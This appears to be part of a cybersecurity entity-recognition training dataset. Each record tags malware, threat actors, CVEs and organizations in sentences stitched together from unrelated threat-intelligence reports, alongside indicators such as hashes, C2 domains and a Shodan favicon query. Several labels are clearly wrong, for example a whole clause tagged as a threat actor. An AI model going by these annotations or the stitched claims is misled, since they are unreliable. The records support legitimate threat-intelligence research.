{"text": "At the time of writing , a reverse image search for the favicon on Shodan using the query http.favicon.hash:990643579 returned around 40 web servers which use the same favicon . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . The commands used to communicate with the C2 servers and other strings in the binary are written in Ukrainian . Analyzing the code and data from the C2 , Ryan Sherstobitoff and Asheer Malhotra from McAfee , along with the company 's Advanced Threat Research Team ( ATR ) , discovered new variants of the Rising Sun backdoor that were used since at least 2016 .", "spans": {"MALWARE: malicious.DOC": [[264, 277]], "VULNERABILITY: Microsoft Common Controls vulnerability": [[297, 336]], "VULNERABILITY: CVE-2012-0158": [[339, 352]], "TOOL: C2": [[397, 399]], "SYSTEM: C2": [[504, 506]], "ORGANIZATION: Ryan Sherstobitoff": [[509, 527]], "ORGANIZATION: Asheer Malhotra": [[532, 547]], "ORGANIZATION: McAfee": [[553, 559]], "ORGANIZATION: Advanced Threat Research Team ( ATR )": [[588, 625]], "TOOL: Rising Sun backdoor": [[659, 678]]}, "info": {"id": "cyberner_stix_train_004777", "source": "cyberner_stix_train"}}
{"text": "Figure 8 . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . Filename: C:\\Windows\\beauty.jpg .", "spans": {"MALWARE: document": [[45, 53]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[60, 97]], "FILEPATH: C:\\Windows\\beauty.jpg": [[110, 131]]}, "info": {"id": "cyberner_stix_train_004778", "source": "cyberner_stix_train"}}
{"text": "Kill / start processes .", "spans": {}, "info": {"id": "cyberner_stix_train_004779", "source": "cyberner_stix_train"}}
{"text": "As we ’ ve mentioned earlier , Triada is downloaded by smaller Trojans that have leveraged the access privileges . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East .", "spans": {"MALWARE: Triada": [[31, 37]], "VULNERABILITY: CVE-2018-8414": [[189, 202]], "THREAT_ACTOR: DarkHydrus": [[292, 302]], "ORGANIZATION: financial": [[396, 405]], "ORGANIZATION: government": [[408, 418]], "ORGANIZATION: energy": [[421, 427]], "ORGANIZATION: chemical": [[430, 438]], "ORGANIZATION: telecommunications": [[445, 463]]}, "info": {"id": "cyberner_stix_train_004780", "source": "cyberner_stix_train"}}
{"text": "Versions 5.X.X-8.X.X were active in 2016 , and versions 9.X.X-1.X.X in 2017 . In comparison to other threat groups , TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger . We analyzed the kits , which were designed to steal information from the automotive and finance industries , launch subsequent attacks on already compromised systems , and ( possibly ) sell stolen information . In some campaigns , the random names are generated by a specific function in the VBA code .", "spans": {"THREAT_ACTOR: TG-3390": [[117, 124]], "TOOL: custom backdoor": [[202, 217]], "TOOL: credential logger": [[222, 239]], "THREAT_ACTOR: the random names are generated by a specific function in the VBA code": [[473, 542]]}, "info": {"id": "cyberner_stix_train_004781", "source": "cyberner_stix_train"}}
{"text": "Malicious app com.qualcmm.timeservices As I mentioned before , in the “ initial phase ” , the Trojan will install the “ com.qualcmm.timeservices ” app . This APT group usually carries out target attacks against government agencies to steal sensitive information . The details we have analyzed during hundreds of investigations convince us that the groups conducting these activities are based primarily in China and that the Chinese Government is aware of them . This model is flexible and enables the operators to constantly change how their backdoors retrieve further commands or malcode as needed .", "spans": {"ORGANIZATION: government agencies": [[211, 230]]}, "info": {"id": "cyberner_stix_train_004782", "source": "cyberner_stix_train"}}
{"text": "It creates an ID and it downloads a new , interesting backdoor , ( this time ) written in Delphi .", "spans": {"TOOL: Delphi": [[90, 96]]}, "info": {"id": "cyberner_stix_train_004783", "source": "cyberner_stix_train"}}
{"text": "In a similar vein with past CyberBerkut activity , attackers hid behind anonymous activist groups like “ anonpoland ” , and data from victimized organizations were similarly leaked and “ weaponized ” .", "spans": {}, "info": {"id": "cyberner_stix_train_004784", "source": "cyberner_stix_train"}}
{"text": "In 2018 , we have already observed a small but consistent number of samples . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper . FireEye analysts documented the admin@338 group 's activities in a previous paper titled Poison Ivy : Assessing Damage and Extracting Intelligence paper .", "spans": {"MALWARE: KopiLuwak": [[148, 157]], "MALWARE: MSIL dropper": [[225, 237]], "ORGANIZATION: FireEye": [[240, 247]], "THREAT_ACTOR: admin@338 group": [[272, 287]], "MALWARE: Poison Ivy": [[329, 339]]}, "info": {"id": "cyberner_stix_train_004785", "source": "cyberner_stix_train"}}
{"text": "Then it will ask for the accessibility service privilege as visible in the following screenshot : After the user grants the requested privilege , Cerberus starts to abuse it by granting itself additional permissions , such as permissions needed to send messages and make calls , without requiring any user interaction . The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia . The APT39 were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation .", "spans": {"MALWARE: Cerberus": [[146, 154]], "THREAT_ACTOR: SectorJ04": [[324, 333]], "THREAT_ACTOR: APT39": [[528, 533]]}, "info": {"id": "cyberner_stix_train_004786", "source": "cyberner_stix_train"}}
{"text": "The intricate anti-analysis methods reveal how much effort the FinFisher authors exerted to keep the malware hidden and difficult to analyze . The Spring Dragon appears to have rolled out a steady mix of exploits against government-related organizations in VN , TW , PH , and other locations over the past few years . The last one is perhaps less obvious . Although COSMICENERGY does not directly overlap with any previously observed malware families , its capabilities are comparable to those employed in previous incidents and malware .", "spans": {"MALWARE: FinFisher": [[63, 72]], "THREAT_ACTOR: Spring Dragon": [[147, 160]], "ORGANIZATION: government-related organizations": [[221, 253]], "MALWARE: COSMICENERGY": [[366, 378]], "MALWARE: malware": [[434, 441], [529, 536]]}, "info": {"id": "cyberner_stix_train_004787", "source": "cyberner_stix_train"}}
{"text": "There are a lot of small Trojans for Android capable of leveraging access privileges , in other words — gaining root access . This sample was also found to be deployed using the CVE-2012-0158 vulnerability . This realization suggests that the OilRig threat group will continue to use their delivery documents for extended periods with subtle modifications to remain effective .", "spans": {"SYSTEM: Android": [[37, 44]], "VULNERABILITY: CVE-2012-0158": [[178, 191]], "THREAT_ACTOR: OilRig": [[243, 249]], "MALWARE: delivery documents": [[290, 308]]}, "info": {"id": "cyberner_stix_train_004788", "source": "cyberner_stix_train"}}
{"text": "These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_004789", "source": "cyberner_stix_train"}}
{"text": "2016 freedns.website streamout.space 2017–2018 : streamout.space sky-sync.pw gms-service.info EventBot : A New Mobile Banking Trojan is Born April 30 , 2020 KEY FINDINGS The Cybereason Nocturnus team is investigating EventBot , a new type of Android mobile malware that emerged around March 2020 . The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe . We assess with moderate confidence that APT40 is a state-sponsored Chinese Cyber Espionage operation .", "spans": {"MALWARE: EventBot": [[94, 102], [217, 225]], "ORGANIZATION: Cybereason Nocturnus": [[174, 194]], "SYSTEM: Android": [[242, 249]], "VULNERABILITY: CVE2017-11882": [[325, 338]], "TOOL: HTML Application": [[369, 385]], "MALWARE: HTA": [[388, 391]], "MALWARE: mshta.exe": [[521, 530]], "THREAT_ACTOR: APT40": [[573, 578]]}, "info": {"id": "cyberner_stix_train_004790", "source": "cyberner_stix_train"}}
{"text": "However , CTU analysis indicates that GOLD LOWELL is motivated by financial gain , and there is no evidence of the threat actors using network access for espionage or data theft . Syncopate is a well-known Russian company that is best known as the developer and operator of the ' GameNet ' platform .", "spans": {"ORGANIZATION: CTU": [[10, 13]], "THREAT_ACTOR: GOLD LOWELL": [[38, 49]], "ORGANIZATION: company": [[214, 221]]}, "info": {"id": "cyberner_stix_train_004791", "source": "cyberner_stix_train"}}
{"text": "The type of data corresponding to the value coded in GolfSpy Figure 5 shows the code snippets that are involved in monitoring and recording the device ’ s phone call . The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload . Interestingly , more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage , from the date and time of operating system installation and membership in a Windows domain to a list of and the resolutions of the workstation’s monitors . When they pay for someone else ’s malware kit , whether it be ransomware or a phishing bot , they do n’t have to invest time , money or labor to write their own malicious code or tools and instead can hop right into deploying the malware .", "spans": {"MALWARE: GolfSpy": [[53, 60]], "TOOL: downloader malware": [[172, 190]], "SYSTEM: Windows": [[472, 479]]}, "info": {"id": "cyberner_stix_train_004792", "source": "cyberner_stix_train"}}
{"text": "Windows Defender ATP helps network security professionals deal with intrusions from activity groups like LEAD and BARIUM in several ways .", "spans": {"TOOL: Windows Defender ATP": [[0, 20]], "THREAT_ACTOR: LEAD": [[105, 109]], "THREAT_ACTOR: BARIUM": [[114, 120]]}, "info": {"id": "cyberner_stix_train_004793", "source": "cyberner_stix_train"}}
{"text": "SHA256 : 4dcf5bd2c7a5822831d9f22f46bd2369c4c9df17cc99eb29975b5e8ae7e88606 .", "spans": {"FILEPATH: 4dcf5bd2c7a5822831d9f22f46bd2369c4c9df17cc99eb29975b5e8ae7e88606": [[9, 73]]}, "info": {"id": "cyberner_stix_train_004794", "source": "cyberner_stix_train"}}
{"text": "Downeks can also be instructed to execute binaries that already exist on the victim machine .", "spans": {"MALWARE: Downeks": [[0, 7]]}, "info": {"id": "cyberner_stix_train_004795", "source": "cyberner_stix_train"}}
{"text": "To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software . Named Trochilus , this new RAT was part of Group 27 's malware portfolio that included six other malware strains , all served together or in different combinations , based on the data that needed to be stolen from each victim .", "spans": {"THREAT_ACTOR: Cobalt group": [[89, 101]], "TOOL: Beacon": [[132, 138]], "MALWARE: Trochilus": [[219, 228]], "MALWARE: RAT": [[240, 243]]}, "info": {"id": "cyberner_stix_train_004796", "source": "cyberner_stix_train"}}
{"text": "The sample used in this attack ( MD5 A96F4B8AC7AA9DBF4624424B7602D4F7 , compiled July 29th , 2015 ) was a pretty standard Sofacy x64 AZZY implant , which has the internal name “ advshellstore.dll ” .", "spans": {"FILEPATH: A96F4B8AC7AA9DBF4624424B7602D4F7": [[37, 69]], "THREAT_ACTOR: Sofacy": [[122, 128]], "MALWARE: AZZY": [[133, 137]], "FILEPATH: advshellstore.dll": [[178, 195]]}, "info": {"id": "cyberner_stix_train_004797", "source": "cyberner_stix_train"}}
{"text": "Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . CTU researchers have not observed TG-3390 actors performing reconnaissance prior to compromising organizations .", "spans": {"ORGANIZATION: CTU": [[285, 288]], "THREAT_ACTOR: TG-3390": [[319, 326]], "ORGANIZATION: compromising organizations": [[369, 395]]}, "info": {"id": "cyberner_stix_train_004799", "source": "cyberner_stix_train"}}
{"text": "The new miner employed by Pacha Group , named Linux.GreedyAntd , has shown to be more sophisticated than the average Linux threat , using evasion techniques rarely seen in Linux malware . The intelligence we have collected shows that Silence is part of a more extensive operation , still focused on financial institutions operating mainly on Russian territory .", "spans": {"THREAT_ACTOR: Pacha Group": [[26, 37]], "TOOL: Linux.GreedyAntd": [[46, 62]], "TOOL: Linux malware": [[172, 185]], "ORGANIZATION: financial institutions": [[299, 321]]}, "info": {"id": "cyberner_stix_train_004800", "source": "cyberner_stix_train"}}
{"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . Emissary Panda has used many ACTs with the most notable being the exploits from the Hacking Team leak .", "spans": {"MALWARE: RTF attachments": [[44, 59]], "VULNERABILITY: CVE-2017-0199": [[124, 137]]}, "info": {"id": "cyberner_stix_train_004801", "source": "cyberner_stix_train"}}
{"text": "Gooligan then downloads a rootkit from the C & C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT ( CVE-2013-6282 ) and Towelroot ( CVE-2014-3153 ) . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . where the immediate constant can be different . PIEHOP expects its main function to be called via another Python file , supplying either the argument or .", "spans": {"MALWARE: Gooligan": [[0, 8]], "SYSTEM: Android 4 and 5": [[89, 104]], "VULNERABILITY: VROOT": [[139, 144]], "VULNERABILITY: CVE-2013-6282": [[147, 160]], "VULNERABILITY: Towelroot": [[167, 176]], "VULNERABILITY: CVE-2014-3153": [[179, 192]], "THREAT_ACTOR: group": [[227, 232]], "THREAT_ACTOR: hackers": [[251, 258]], "VULNERABILITY: zero-day exploit": [[302, 318]], "THREAT_ACTOR: Gamma Group": [[444, 455]], "TOOL: PIEHOP": [[506, 512]]}, "info": {"id": "cyberner_stix_train_004802", "source": "cyberner_stix_train"}}
{"text": "Other infection vectors include pornographic websites serving apps called Adobe Flash or YouPorn . Shrouded Crossbow employs three BIFROST-derived backdoors : BIFROSE , KIVARS , and XBOW . A similar service , vicp.net , is also seen in many of the domains . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": {"SYSTEM: Adobe Flash": [[74, 85]], "SYSTEM: YouPorn": [[89, 96]], "TOOL: BIFROST-derived backdoors": [[131, 156]], "TOOL: BIFROSE": [[159, 166]], "TOOL: KIVARS": [[169, 175]], "TOOL: XBOW": [[182, 186]], "URL: vicp.net": [[209, 217]], "ORGANIZATION: CSP": [[258, 261]], "TOOL: browser": [[300, 307]], "SYSTEM: URL": [[359, 362]]}, "info": {"id": "cyberner_stix_train_004803", "source": "cyberner_stix_train"}}
{"text": "Attackers also used the name of the top-ranking official associated with Minister of Home affairs in the signature of the email , this is to make it look like the email was sent by a high-ranking Government official associated with Ministry of Home Affairs ( MHA ) .", "spans": {"TOOL: name of the top-ranking official": [[24, 56]], "ORGANIZATION: Minister of Home affairs": [[73, 97]], "TOOL: email": [[122, 127], [163, 168]], "ORGANIZATION: Ministry of Home Affairs": [[232, 256]], "ORGANIZATION: MHA": [[259, 262]]}, "info": {"id": "cyberner_stix_train_004804", "source": "cyberner_stix_train"}}
{"text": "Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . Our prior publication also failed to acknowledge immensely valuable input from a number of colleagues , including Nadim Kobeissi 's feedback on how the API endpoints on the Android malware were encrypted .", "spans": {"THREAT_ACTOR: APT41": [[10, 15]], "VULNERABILITY: exploit": [[52, 59]], "VULNERABILITY: CVE-2019-3396": [[69, 82]], "SYSTEM: Android": [[294, 301]], "MALWARE: malware": [[302, 309]]}, "info": {"id": "cyberner_stix_train_004806", "source": "cyberner_stix_train"}}
{"text": "Stick to Google Play and use VPN software from reputable vendors . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime . If you aren’t familiar with those structures ( e.g , The sample of PIEHOP we obtained contains programming logic errors that prevent it from successfully performing its IEC-104 control capabilities , but we believe these errors can be easily corrected .", "spans": {"SYSTEM: Google Play": [[9, 20]], "THREAT_ACTOR: APT38": [[129, 134]], "ORGANIZATION: financial institutions": [[170, 192]]}, "info": {"id": "cyberner_stix_train_004807", "source": "cyberner_stix_train"}}
{"text": "It appears that the attackers are somewhat familiar with the language and mountain-trekking culture of the targets – the meaning of “ chuli ” is “ summit ” : The command-and-control server and parameters can be easily seen in the decompiled source code : Command and control server interaction code Throughout the code , the attackers log all important actions , which include various messages in Chinese . Execute a command through exploits for CVE-2018-0802 . FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group — which goes by other names , including FinFisher and Lench IT Solutions .", "spans": {"VULNERABILITY: CVE-2018-0802": [[446, 459]], "MALWARE: FinSpy": [[462, 468]], "THREAT_ACTOR: attacker": [[512, 520]], "THREAT_ACTOR: Gamma Group": [[627, 638]], "ORGANIZATION: FinFisher": [[679, 688]]}, "info": {"id": "cyberner_stix_train_004808", "source": "cyberner_stix_train"}}
{"text": "However , many of these loader samples embed CosmicDuke variants that exploit the CVE-2010- 0232 privilege escalation vulnerability thus making it impossible for the compilation timestamps to be authentic .", "spans": {"MALWARE: CosmicDuke": [[45, 55]], "VULNERABILITY: CVE-2010- 0232": [[82, 96]]}, "info": {"id": "cyberner_stix_train_004809", "source": "cyberner_stix_train"}}
{"text": "Emergency SMS commands . Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . APT33 : af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3 S-SHA2 DarkComet . Checking the transcript log file created to see the full session .", "spans": {"MALWARE: Documents": [[25, 34]], "VULNERABILITY: Flash exploit": [[44, 57]], "THREAT_ACTOR: APT33": [[143, 148]], "MALWARE: af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3 S-SHA2 DarkComet": [[151, 232]]}, "info": {"id": "cyberner_stix_train_004810", "source": "cyberner_stix_train"}}
{"text": "Indian organizations targeted in Suckfly attacks .", "spans": {"THREAT_ACTOR: Suckfly": [[33, 40]]}, "info": {"id": "cyberner_stix_train_004811", "source": "cyberner_stix_train"}}
{"text": "APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates . Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "FILEPATH: wuaupdt.exe": [[235, 246]], "TOOL: C2": [[301, 303]]}, "info": {"id": "cyberner_stix_train_004812", "source": "cyberner_stix_train"}}
{"text": "While these industries may appear to be unrelated , we found them to have multiple links to healthcare , such as large manufacturers that produce medical imaging devices sold directly into healthcare firms , IT organizations that provide support services to medical clinics , and logistical organizations that deliver healthcare products . Between June 2008 and March 2009 the Information Warfare Monitor conducted an extensive and exhaustive two-phase investigation focused on allegations of Chinese cyber espionage against the Tibetan community .", "spans": {"ORGANIZATION: healthcare": [[92, 102], [318, 328]], "ORGANIZATION: healthcare firms": [[189, 205]], "ORGANIZATION: IT organizations": [[208, 224]], "ORGANIZATION: medical clinics": [[258, 273]], "ORGANIZATION: logistical organizations": [[280, 304]], "TOOL: Information Warfare Monitor": [[377, 404]], "ORGANIZATION: Tibetan community": [[529, 546]]}, "info": {"id": "cyberner_stix_train_004813", "source": "cyberner_stix_train"}}
{"text": "The threat actors retrieved the NTDS.dit file from the volume shadow copy .", "spans": {"FILEPATH: NTDS.dit": [[32, 40]]}, "info": {"id": "cyberner_stix_train_004814", "source": "cyberner_stix_train"}}
{"text": "Sometimes , both malware have used the same C&C server , but in other cases , even the servers have been different .", "spans": {"TOOL: C&C": [[44, 47]]}, "info": {"id": "cyberner_stix_train_004815", "source": "cyberner_stix_train"}}
{"text": "In particular , these apps try to add an additional method called statistics ( ) into the Activity class . In July , Nitro compromised a South Korean clothing and accessories manufacturer 's website to serve malware commonly referred to as \" Spindest \" . The difference in sponsorship could be the result of tasking systems that allocate targeting responsibility to different groups based on their targets ’ geographic location . Local investigators later confirmed that the energy outage was caused by a cyberattack .", "spans": {"TOOL: Spindest": [[242, 250]], "ORGANIZATION: Local investigators": [[430, 449]], "THREAT_ACTOR: cyberattack": [[505, 516]]}, "info": {"id": "cyberner_stix_train_004816", "source": "cyberner_stix_train"}}
{"text": "Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 .", "spans": {"THREAT_ACTOR: Zebrocy": [[0, 7]], "VULNERABILITY: 0day exploits": [[132, 145]], "FILEPATH: Filensfer": [[148, 157]]}, "info": {"id": "cyberner_stix_train_004817", "source": "cyberner_stix_train"}}
{"text": "For example , the botnet Trojan-SMS.AndroidOS.Opfake.a , in addition to its own activity , also spread Backdoor.AndroidOS.Obad.a by sending spam containing a link to the malware to the victim ’ s list of contacts . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can′t prove they were related to this particular attack . About the “ Winnti Group ” naming : After gaining access to a victim network , UNC2452 has a light malware footprint , often using legitimate credentials to access data and move laterally .", "spans": {"MALWARE: Trojan-SMS.AndroidOS.Opfake.a": [[25, 54]], "MALWARE: Backdoor.AndroidOS.Obad.a": [[103, 128]], "VULNERABILITY: CVE-2017-11882": [[280, 294]], "TOOL: Microsoft Office Equation Editor": [[297, 329]], "THREAT_ACTOR: Winnti Group": [[468, 480]], "THREAT_ACTOR: UNC2452": [[535, 542]], "THREAT_ACTOR: a light malware footprint , often using legitimate credentials to access data and move laterally": [[547, 643]]}, "info": {"id": "cyberner_stix_train_004818", "source": "cyberner_stix_train"}}
{"text": "Some FinFisher variants incorporate an MBR rootkit , the exact purpose of which is not clear . A paper from FireEye in 2013 on several campaigns using PIVY included menuPass as one of them . Finally , the launcher passes control to the main backdoor routine . Iranian APT group Siamesekitten PDF was identified as responsible for a supply chain attack campaign that targeted IT and communication companies in Israel .", "spans": {"MALWARE: FinFisher": [[5, 14]], "ORGANIZATION: FireEye": [[108, 115]], "TOOL: PIVY": [[151, 155]], "THREAT_ACTOR: Iranian APT group": [[260, 277]], "THREAT_ACTOR: Siamesekitten PDF": [[278, 295]], "ORGANIZATION: IT and communication companies": [[375, 405]]}, "info": {"id": "cyberner_stix_train_004819", "source": "cyberner_stix_train"}}
{"text": "It mentions closing the Fatah headquarters and houses that were identified as meeting places as well as the arrest of some members of the party .", "spans": {"ORGANIZATION: Fatah": [[24, 29]]}, "info": {"id": "cyberner_stix_train_004820", "source": "cyberner_stix_train"}}
{"text": "CYBEREASON MOBILE Cybereason Mobile detects EventBot and immediately takes remediation actions to protect the end user . FireEye believes that two actors – Turla and an unknown financially motivated actor – were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 . PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection .", "spans": {"SYSTEM: CYBEREASON MOBILE": [[0, 17]], "SYSTEM: Cybereason Mobile detects": [[18, 43]], "MALWARE: EventBot": [[44, 52]], "ORGANIZATION: FireEye": [[121, 128]], "THREAT_ACTOR: actors": [[147, 153]], "ORGANIZATION: financially": [[177, 188]], "VULNERABILITY: CVE-2017-0261": [[241, 254]], "THREAT_ACTOR: APT28": [[261, 266]], "VULNERABILITY: CVE-2017-0262": [[301, 314]], "VULNERABILITY: CVE-2017-0263": [[371, 384]], "ORGANIZATION: PwC UK": [[387, 393]], "ORGANIZATION: BAE Systems": [[398, 409]], "THREAT_ACTOR: APT10": [[442, 447]]}, "info": {"id": "cyberner_stix_train_004821", "source": "cyberner_stix_train"}}
{"text": "The OceanLotus group was first revealed and named by QiAnXin in May 2015 . It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool . Waterbug also used an older version of PowerShell , likely to avoid logging . In one of these campaigns , Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest . The malware then uses WebDAV to upload the RAR archive to a Box account .", "spans": {"THREAT_ACTOR: OceanLotus": [[4, 14]], "ORGANIZATION: QiAnXin": [[53, 60]], "ORGANIZATION: Microsoft": [[100, 109]], "MALWARE: PsExec tool": [[168, 179]], "THREAT_ACTOR: Waterbug": [[182, 190], [288, 296]], "MALWARE: PowerShell": [[221, 231]], "MALWARE: USB stealer": [[304, 315]], "FILEPATH: malware": [[401, 408]], "MALWARE: WebDAV": [[419, 425]], "FILEPATH: RAR archive": [[440, 451]]}, "info": {"id": "cyberner_stix_train_004822", "source": "cyberner_stix_train"}}
{"text": "The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . When we last heard from the Trojan , its operators were seen launching redirection attacks on four large , U.S. banks in June .", "spans": {"THREAT_ACTOR: agroup": [[4, 10]], "ORGANIZATION: media": [[31, 36]], "THREAT_ACTOR: admin@338": [[55, 64]], "TOOL: remote access Trojans": [[122, 143]], "TOOL: Poison Ivy": [[152, 162]], "ORGANIZATION: government": [[173, 183]], "ORGANIZATION: financial firms": [[188, 203]], "ORGANIZATION: global economic": [[220, 235]], "MALWARE: Trojan": [[273, 279]], "ORGANIZATION: banks": [[357, 362]]}, "info": {"id": "cyberner_stix_train_004823", "source": "cyberner_stix_train"}}
{"text": "Finally , the Ashas adware family has its code hidden under the com.google.xxx package name . In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros . Email Security can block malicious emails sent by threat actors as part of their campaign .", "spans": {"MALWARE: Ashas": [[14, 19]], "THREAT_ACTOR: APT32": [[122, 127]], "MALWARE: ActiveMime files": [[142, 158]], "TOOL: Email Security": [[242, 256]], "TOOL: emails": [[277, 283]]}, "info": {"id": "cyberner_stix_train_004824", "source": "cyberner_stix_train"}}
{"text": "It means the phone can be unblocked in some cases when it has been blocked by one of the above HTML pages . The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload . The Leviathan , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 .", "spans": {"MALWARE: AmmyyService.exe": [[205, 221]], "MALWARE: AmmyySvc.exe": [[225, 237]], "THREAT_ACTOR: Leviathan": [[282, 291]], "ORGANIZATION: military": [[382, 390]]}, "info": {"id": "cyberner_stix_train_004825", "source": "cyberner_stix_train"}}
{"text": "ProGuard Obfuscation As with many other Android applications , EventBot is now using obfuscation . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . By compromising a user account that has administrative or elevated access , Magic Hound can quickly access a targeted environment to achieve their objectives .", "spans": {"SYSTEM: ProGuard": [[0, 8]], "SYSTEM: Android": [[40, 47]], "MALWARE: EventBot": [[63, 71]], "MALWARE: SWAnalytics": [[133, 144]]}, "info": {"id": "cyberner_stix_train_004826", "source": "cyberner_stix_train"}}
{"text": "It is worth noting that if the source file location contains the string “ System Volume Information\\S-1-5-21-1315235578-283289242\\ ” , then the file is deleted after copying to the “ stash ” directory .", "spans": {}, "info": {"id": "cyberner_stix_train_004827", "source": "cyberner_stix_train"}}
{"text": "Along with the executable , two binary files , inject.bin (malicious function code) and imain.bin (malicious control logic) , were deployed as the controller’s payload . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data .", "spans": {"MALWARE: binary files": [[32, 44]], "MALWARE: imain.bin": [[88, 97]], "MALWARE: WannaCry": [[170, 178]], "FILEPATH: .WCRY": [[217, 222]], "TOOL: Bitcoin": [[308, 315]]}, "info": {"id": "cyberner_stix_train_004828", "source": "cyberner_stix_train"}}
{"text": "update.exe module and Keylogger by ‘ El3ct71k ’ code comparison Xenotix Python Keylogger including specified mutex ‘ mutex_var_xboz ’ . To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . admin@338 is a China based cyber threat group .", "spans": {"SYSTEM: Xenotix Python Keylogger": [[64, 88]], "MALWARE: SWAnalytics": [[186, 197]], "THREAT_ACTOR: admin@338": [[296, 305]]}, "info": {"id": "cyberner_stix_train_004829", "source": "cyberner_stix_train"}}
{"text": "This naming decision was founded upon the underlying methodology described in the Diamond Model of intrusion analysis .", "spans": {}, "info": {"id": "cyberner_stix_train_004830", "source": "cyberner_stix_train"}}
{"text": "The SMS message with a link to a banker looked as follows : “ % USERNAME % , i send you prepayment gumtree [ . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . Based on the compilation date of the two binaries , this campaign took place in September 2014 .", "spans": {"THREAT_ACTOR: Silence": [[130, 137]], "TOOL: Perl IRC bot": [[171, 183]], "TOOL: public IRC": [[188, 198]]}, "info": {"id": "cyberner_stix_train_004831", "source": "cyberner_stix_train"}}
{"text": "The “ core ” module contacts the C & C server , trying to get a fresh list of applications to search for , or if that fails , use a default app list : whatsapp lenovo.anyshare.gps mxtech.videoplayer.ad jio.jioplay.tv jio.media.jiobeats jiochat.jiochatapp jio.join good.gamecollection opera.mini.native startv.hotstar meitu.beautyplusme domobile.applock touchtype.swiftkey flipkart.android cn.xender It is worth noting that attackers used the same compromised websites to spread Buhtrap as those that had been used for the Corkow Trojan . In later stages , Dexphot targets a few other system processes for process hollowing : svchost.exe , tracert.exe , and setup.exe . Enterprise T1078 Valid Accounts APT29 has used a compromised account to access an organization 's VPN infrastructure .", "spans": {"SYSTEM: whatsapp": [[151, 159]], "TOOL: compromised websites": [[447, 467]], "TOOL: Buhtrap": [[478, 485]], "TOOL: Corkow Trojan": [[522, 535]], "MALWARE: Dexphot": [[556, 563]], "FILEPATH: svchost.exe": [[625, 636]], "FILEPATH: tracert.exe": [[639, 650]], "FILEPATH: setup.exe": [[657, 666]], "THREAT_ACTOR: Accounts APT29": [[692, 706]], "SYSTEM: organization 's VPN infrastructure": [[751, 785]]}, "info": {"id": "cyberner_stix_train_004832", "source": "cyberner_stix_train"}}
